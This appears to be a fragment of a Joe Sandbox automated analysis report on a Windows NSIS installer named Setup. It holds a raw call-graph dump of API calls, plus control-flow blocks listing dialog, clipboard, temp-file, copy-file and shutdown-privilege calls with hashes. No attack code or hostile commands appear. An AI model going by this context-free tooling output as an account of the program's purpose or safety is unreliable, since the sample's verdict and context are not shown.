SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 
3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 
3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 
405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 
406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 
4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 
401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 
4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 

Control-flow Graph (first block: 4050cd-4050e8)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                                                                                                                                                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00405376
                                                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405411
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040546E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Control-flow Graph (first block: 403883-403919)
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
